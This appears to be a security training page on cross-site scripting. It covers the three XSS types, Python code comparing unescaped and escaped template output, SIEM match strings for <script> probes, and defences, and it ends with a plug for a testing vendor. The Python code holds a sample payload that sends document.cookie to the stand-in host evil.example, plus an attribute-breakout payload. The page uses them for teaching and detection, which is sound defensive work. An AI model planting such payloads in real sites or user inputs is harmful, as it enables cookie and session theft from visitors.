Cross Site Scripting (XSS) Attacks
Cross Site Scripting (XSS) is a type of injection attack in which malicious client-side code is injected into a website that otherwise looks benign and trusted. Attackers have discovered numerous and ingenious methods for getting malicious content served from trusted websites, including Common Gateway Interface (CGI) script flaws, web server software vulnerabilities, SQL injection, frame exploitation, DNS redirects, cookie hijacking and many other forms of attack; XSS is the one this page covers.
In an XSS attack, the attacker delivers malicious code to an unsuspecting user through a vulnerable web application, usually in the form of a specially crafted link. The crafted code executes in the user's browser when the link is visited, and the harm is done. Typical results of a successful XSS attack are a change in the behaviour or appearance of the website, actions performed on behalf of the user, or theft of personal information.
XSS can therefore be thought of as a security flaw in a website: one that can occur anywhere a web application accepts input from a user and includes it in its output without proper validation and output encoding.
A successful XSS attack can result in identity theft, credential theft, data theft, financial losses, or the planting of remote-control software on visiting clients.
Thus,
- XSS attacks enable an attacker to inject their malicious code (in client-side scripting languages, such as JavaScript) into vulnerable web pages.
- When an unsuspecting user visits the infected page, the malicious code executes on the victim’s browser and may lead to stolen cookies, hijacked sessions, malware execution, or bypassed access control, or aid in exploiting browser vulnerabilities.
There are three types of XSS vulnerability:
- Non-persistent (reflected) XSS vulnerabilities: the attacker tricks the victim into requesting a URL that carries a rogue script, the server echoes that script back into its response, and the script runs in the victim's browser, where it can steal sensitive information (cookies, session IDs, etc.). The attack exploits the lack of proper input or output validation on dynamic websites.
- Persistent (stored or second-order) XSS vulnerabilities: these target websites that store user-supplied data in a database or similar location, e.g. forums, message boards and guest books. The attacker posts text containing malicious JavaScript, and when other users later view the post, their browsers render the page and execute the attacker's JavaScript.
- DOM-based (local) XSS vulnerabilities: the DOM (Document Object Model) is the standard tree structure the browser uses to represent HTML and XML documents, and page components such as form fields, the URL and cookies can be read through it from JavaScript. In DOM-based XSS the page's own legitimate client-side JavaScript reads attacker-controlled data from the DOM environment (for example the URL fragment) and writes it back into the page unsafely, so the victim's browser executes the resulting abusive JavaScript. Because the payload can be carried entirely in the URL fragment, which browsers do not send to the server, it may never appear in server-side logs.
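The flaw behind reflected and stored XSS is the same: untrusted data is written into HTML without encoding for the context it lands in. The following is an added example (not code from the original page) that models a server-side template in Python. It renders a user-supplied value both unsafely and with html.escape, and then uses the standard-library HTML parser to compare the element and attribute structure a browser would build against the structure produced by a benign value; any change in that structure means the input was interpreted as markup. The template functions, the sample payloads and the baseline value "Alice" are all constructed for the example.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs (not from the original page): a benign value,
# a classic reflected/stored payload, and an attribute-context breakout
# that contains no <script> tag at all.
BENIGN = "Alice"
SCRIPT_PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'


def render_vulnerable(name):
    """Echoes the untrusted value straight into the element body (the XSS flaw)."""
    return f"<p>Hello, {name}!</p>"


def render_escaped(name):
    """Same template, with the value HTML-encoded for the element-body context."""
    return f"<p>Hello, {html.escape(name)}!</p>"


def render_attr_vulnerable(value):
    """Untrusted value placed inside a quoted attribute without encoding quotes."""
    return f'<input type="text" value="{value}">'


def render_attr_escaped(value):
    """quote=True also encodes " and ', so the attacker cannot close the attribute."""
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


class _Structure(HTMLParser):
    """Collects (tag, attribute names) for every start tag: the markup a browser would build."""

    def __init__(self):
        super().__init__()
        self.elements = []

    def handle_starttag(self, tag, attrs):
        self.elements.append((tag, tuple(sorted(name for name, _ in attrs))))


def structure(markup):
    """Parse markup and return its tag/attribute structure."""
    parser = _Structure()
    parser.feed(markup)
    parser.close()
    return parser.elements


def injected(template_fn, payload, baseline=BENIGN):
    """True if the payload adds tags or attributes compared with a benign value
    rendered through the same template, i.e. the browser would treat it as markup."""
    return structure(template_fn(payload)) != structure(template_fn(baseline))


if __name__ == "__main__":
    for fn, payload in [(render_vulnerable, SCRIPT_PAYLOAD),
                        (render_escaped, SCRIPT_PAYLOAD),
                        (render_attr_vulnerable, ATTR_PAYLOAD),
                        (render_attr_escaped, ATTR_PAYLOAD)]:
        print(f"{fn.__name__:22} injected={injected(fn, payload)}  {fn(payload)}")
```

The attribute case is why "filter <script>" on its own is not a defence: the breakout payload never uses a tag, it only closes the quoted attribute and adds an event handler, so the encoding has to match the context (element body, attribute value, URL, JavaScript string) into which the data is written.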
Where should you collect logs from?
Web server access logs, web application firewall (WAF) logs, IDS/IPS logs and, where available, application logs that record request parameters.
How to detect using SIEM?
A handful of strings recur in XSS payloads, and the simplest SIEM rule looks for them in the URL field of the web server log: a <script> tag, either literal or URL-encoded, is the classic indicator of an XSS attempt carried in the URL.
Raise an alert when the URL field matches any value in this list (match case-insensitively, since %3C and %3c are equivalent):
[*<script>*, *%3c%73%63%72%69%70%74%3e*, *%3cscript%3e*]
This catches only the most common probes. Payloads built from event handlers (onerror=, onload=), javascript: URIs or double encoding (%253C) will not match, so decode the URL before matching and extend the list; DOM-based payloads carried in the URL fragment never reach the server at all.
How to defend against XSS?
As an administrator you can do the following:
- maintain a patched web server,
- use web application firewalls,
- operate a host-based intrusion detection system (HIDS),
- audit for suspicious activity, and,
- most important, perform server-side input validation (length, malicious content, metacharacter filtering) together with context-aware output encoding of every untrusted value that is written into a page.
As a web user you can do the following:
- keep your system patched,
- run antivirus software, and
- avoid non-mainstream websites.
For web application and penetration testing, there are a number of vendors that provide such services. Security for Everyone (S4E) is one such vendor, providing various professional services.